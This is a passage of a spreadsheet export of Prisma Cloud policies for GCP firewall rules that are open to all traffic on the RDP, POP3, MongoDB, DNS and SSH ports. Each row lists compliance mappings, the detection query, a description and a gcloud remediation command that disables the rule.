          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name='gcloud-compute-firewall-rules-list' AND json.rule = 'disabled is false and direction equals INGRESS and allowed[*] exists and (sourceRanges[*] equals ::0 or sourceRanges[*] equals 0.0.0.0 or sourceRanges[*] equals 0.0.0.0/0 or sourceRanges[*] equals ::/0 or sourceRanges[*] equals ::) and targetTags[*] does not exist and targetServiceAccounts[*] does not exist'</t>
        </is>
      </c>
      <c r="AA2720" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2720" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2720" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-402</t>
        </is>
      </c>
      <c r="AD2720" t="b">
        <v>1</v>
      </c>
      <c r="AE2720" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2720" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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0" t="inlineStr">
        <is>
          <t>f57d5819-0673-4c25-bf43-77cf66e4800d</t>
        </is>
      </c>
      <c r="AI2720" t="inlineStr">
        <is>
          <t>ac2aef26-939c-40e9-9aae-2e9be6fd7d0a</t>
        </is>
      </c>
      <c r="AJ2720" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2720" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2721">
      <c r="A2721" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), HIPAA, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), CIS v1.2.0 (GCP), kfirdaus AWS Account-CS, MITRE ATT&amp;CK v8.2 [Deprecated], CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, Rehan, GDPR, MITRE ATT&amp;CK v6.3 [Deprecated], CIS v1.3.0 (GCP), APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, CIS v3.0.0 (GCP) Level 2, CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, CIS v1.1.0 (GCP), NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, CIS v2.0.0 (GCP) Level 2, Sarbanes Oxley Act (SOX), ISO 27002:2022, MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], jbrox - GDPR, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, NIST CSF, jbrox - GDPR, CIS v1.0.0 (GCP), Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, Copy of CIS Controls v8, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, ITSG-33, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, MITRE ATT&amp;CK v6.3 [Deprecated],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HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2721" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2721" s="2" t="inlineStr"/>
      <c r="D2721" t="inlineStr"/>
      <c r="E2721" t="inlineStr"/>
      <c r="F2721" t="inlineStr"/>
      <c r="G2721" t="b">
        <v>1</v>
      </c>
      <c r="H27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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2721" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2721" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on RDP port (3389)</t>
        </is>
      </c>
      <c r="L2721" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2721" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2721" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2721" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2721" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2721" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2721" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2721" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2721" t="b">
        <v>1</v>
      </c>
      <c r="U2721" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2721" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2721" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on RDP port (3389). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the RDP port (3389) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2721"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 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-2</t>
        </is>
      </c>
      <c r="Y2721" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to RDP port (3389).",
'impact': 'Disable GCP Firewall rule allowing all traffic on RDP port (3389)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2721"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_Port.inRange(3389,3389) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists
{"category":"Networking","resourceTypes":["google_compute_firewall"]}</t>
        </is>
      </c>
      <c r="AA2721" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2721" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2721" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-70-CKV_GCP_3</t>
        </is>
      </c>
      <c r="AD2721" t="b">
        <v>1</v>
      </c>
      <c r="AE2721" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2721" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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1" t="inlineStr">
        <is>
          <t>34175634-0e4a-4e9d-9c77-0c75390b8bdc</t>
        </is>
      </c>
      <c r="AI2721" t="inlineStr">
        <is>
          <t>34175634-0e4a-4e9d-9c77-0c75390b8bdc</t>
        </is>
      </c>
      <c r="AJ2721" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2721" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2722">
      <c r="A2722" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, PCI DSS v4.0,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Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, PCI DSS v4.0, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], jbrox - GDPR, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, NIST CSF, jbrox - GDPR, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, PCI DSS v4.0, Copy of CIS Controls v8, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, ITSG-33, Copy of New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0,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HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2722" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2722" s="2" t="inlineStr"/>
      <c r="D2722" t="inlineStr"/>
      <c r="E2722" t="inlineStr"/>
      <c r="F2722" t="inlineStr"/>
      <c r="G2722" t="b">
        <v>1</v>
      </c>
      <c r="H27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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2722" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2722" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on POP3 port (110)</t>
        </is>
      </c>
      <c r="L2722" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2722" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2722" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2722" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2722" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2722" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2722" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2722" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2722" t="b">
        <v>1</v>
      </c>
      <c r="U2722" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2722" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2722" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on POP3 port (110). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the POP3 port (110) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2722"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22" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to  POP3 port (110).",
'impact': 'Disable GCP Firewall rule which allows all traffic on  POP3 port (110)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2722"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_Port.inRange(110,110) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2722" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2722" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2722" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-67</t>
        </is>
      </c>
      <c r="AD2722" t="b">
        <v>1</v>
      </c>
      <c r="AE2722" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2722" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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2" t="inlineStr">
        <is>
          <t>094b6b65-a37a-4f3b-b08f-5d313a6f5051</t>
        </is>
      </c>
      <c r="AI2722" t="inlineStr">
        <is>
          <t>094b6b65-a37a-4f3b-b08f-5d313a6f5051</t>
        </is>
      </c>
      <c r="AJ2722" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2722" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2723">
      <c r="A2723"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PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0,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RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, FFIEC,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CSA CCM v3.0.1, NIST SP 800-171 Revision 2, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2723" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2723" s="2" t="inlineStr"/>
      <c r="D2723" t="inlineStr"/>
      <c r="E2723" t="inlineStr"/>
      <c r="F2723" t="inlineStr"/>
      <c r="G2723" t="b">
        <v>1</v>
      </c>
      <c r="H27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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2723" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2723" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on MongoDB port (27017)</t>
        </is>
      </c>
      <c r="L2723" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2723" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2723" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2723" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2723" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2723" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2723" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2723" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2723" t="b">
        <v>1</v>
      </c>
      <c r="U2723" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2723" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2723" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on MongoDB port (27017). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the MongoDB port (27017) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2723"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23" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to MongoDB port (27017).",
'impact': 'Disable GCP Firewall rule which allows all traffic on MongoDB port (27017)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2723"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_Port.inRange(27017,27017) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2723" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2723" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2723" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-78</t>
        </is>
      </c>
      <c r="AD2723" t="b">
        <v>1</v>
      </c>
      <c r="AE2723" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2723" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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3" t="inlineStr">
        <is>
          <t>b7ad863b-d54c-4b43-a157-010199a37cac</t>
        </is>
      </c>
      <c r="AI2723" t="inlineStr">
        <is>
          <t>b7ad863b-d54c-4b43-a157-010199a37cac</t>
        </is>
      </c>
      <c r="AJ2723" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2723" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2724">
      <c r="A2724" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), HIPAA, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), kfirdaus AWS Account-CS, MITRE ATT&amp;CK v8.2 [Deprecated], CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, GDPR, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), MPAA Content Protection Best Practices, Microsoft Cloud Security Benchmark v1, NIST CSF, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, Risk Management in Technology (RMiT),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Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, Copy of CIS Controls v8, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, ITSG-33, Copy of New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, ITSG-33, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, CCPA 2018, PIPEDA, NIST CSF, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, NIST SP 800-171 Revision 2, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2724" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2724" s="2" t="inlineStr"/>
      <c r="D2724" t="inlineStr"/>
      <c r="E2724" t="inlineStr"/>
      <c r="F2724" t="inlineStr"/>
      <c r="G2724" t="b">
        <v>1</v>
      </c>
      <c r="H27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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2724" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2724" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on DNS port (53)</t>
        </is>
      </c>
      <c r="L2724" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2724" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2724" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2724" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2724" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2724" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2724" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2724" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2724" t="b">
        <v>1</v>
      </c>
      <c r="U2724" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2724" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2724" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on DNS port (53). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the DNS port (53) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2724"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t>
        </is>
      </c>
      <c r="Y2724" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to DNS port (53).",
'impact': 'Disable GCP Firewall rule which allows all traffic on DNS port (53)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2724"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_Port.inRange(53,53) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists</t>
        </is>
      </c>
      <c r="AA2724" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2724" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2724" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-66</t>
        </is>
      </c>
      <c r="AD2724" t="b">
        <v>1</v>
      </c>
      <c r="AE2724" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2724" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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4" t="inlineStr">
        <is>
          <t>dc3dd864-cff5-4730-84ac-11e212f2c1ff</t>
        </is>
      </c>
      <c r="AI2724" t="inlineStr">
        <is>
          <t>dc3dd864-cff5-4730-84ac-11e212f2c1ff</t>
        </is>
      </c>
      <c r="AJ2724" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2724" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2725">
      <c r="A2725" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), HIPAA, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), CIS v3.0.0 (GCP) Level 2, CIS v1.2.0 (GCP), kfirdaus AWS Account-CS, MITRE ATT&amp;CK v8.2 [Deprecated], CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, GDPR, Rehan, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, PCI DSS v4.0, CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, CIS v2.0.0 (GCP) Level 2, NIST 800-53 Rev4, TX-RAMP Level 1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, CIS v1.1.0 (GCP), NIST 800-53 Rev 5, PCI DSS v3.2.1, Telecommunications Security Act - TSA, CIS Controls v7.1, SOC 2, ISO 27001:2013, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), MPAA Content Protection Best Practices, NIST CSF, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], PCI DSS v4.0, jbrox - GDPR, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, NIST CSF, jbrox - GDPR, PCI DSS v4.0, CIS v1.0.0 (GCP), Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, Copy of CIS Controls v8, CSA CCM v3.0.1, NIST SP 800-171 Revision 3, ITSG-33, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, MITRE ATT&amp;CK v6.3 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, FFIEC, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, kashan ACSC Information Security Manual (ISM), CCPA 2018, PIPEDA, NIST CSF, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS v1.3.0 (GCP), CSA CCM v3.0.1, NIST SP 800-171 Revision 2, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2725" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2725" s="2" t="inlineStr"/>
      <c r="D2725" t="inlineStr"/>
      <c r="E2725" t="inlineStr"/>
      <c r="F2725" t="inlineStr"/>
      <c r="G2725" t="b">
        <v>1</v>
      </c>
      <c r="H27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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2725" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall</t>
        </is>
      </c>
      <c r="K2725" t="inlineStr">
        <is>
          <t>GCP Firewall rule allows all traffic on SSH port (22)</t>
        </is>
      </c>
      <c r="L2725" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2725" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2725" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2725" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2725" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2725" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2725" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2725" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2725" t="b">
        <v>1</v>
      </c>
      <c r="U2725" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2725" t="inlineStr">
        <is>
          <t>gcloud-compute-firewall-rules-list</t>
        </is>
      </c>
      <c r="W2725" t="inlineStr">
        <is>
          <t>This policy identifies GCP Firewall rules which allow all inbound traffic on SSH port (22). Allowing access from arbitrary IP addresses to this port increases the attack surface of your network. It is recommended that the SSH port (22) should be allowed to specific IP addresses.</t>
        </is>
      </c>
      <c r="X2725"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 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-1</t>
        </is>
      </c>
      <c r="Y2725" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'compute.firewalls.update' and 'compute.networks.updatePolicy' permission. Successful execution will disable this firewall rule blocking internet traffic to SSH port (22).",
'impact': 'Disable GCP Firewall rule allowing all traffic on SSH port (22)',
'cliScriptTemplate': 'gcloud compute --project=$account firewall-rules update $resourceName --disabled'</t>
        </is>
      </c>
      <c r="Z2725"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_Port.inRange(22,22) or (ports does not exist and (IPProtocol contains tcp or IPProtocol contains udp)))] exists
{"category":"Networking","resourceTypes":["google_compute_firewall"]}</t>
        </is>
      </c>
      <c r="AA2725" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2725" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2725" t="inlineStr">
        <is>
          <t>PC-GCP-VPC-69-CKV_GCP_2</t>
        </is>
      </c>
      <c r="AD2725" t="b">
        <v>1</v>
      </c>
      <c r="AE2725" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2725" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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5" t="inlineStr">
        <is>
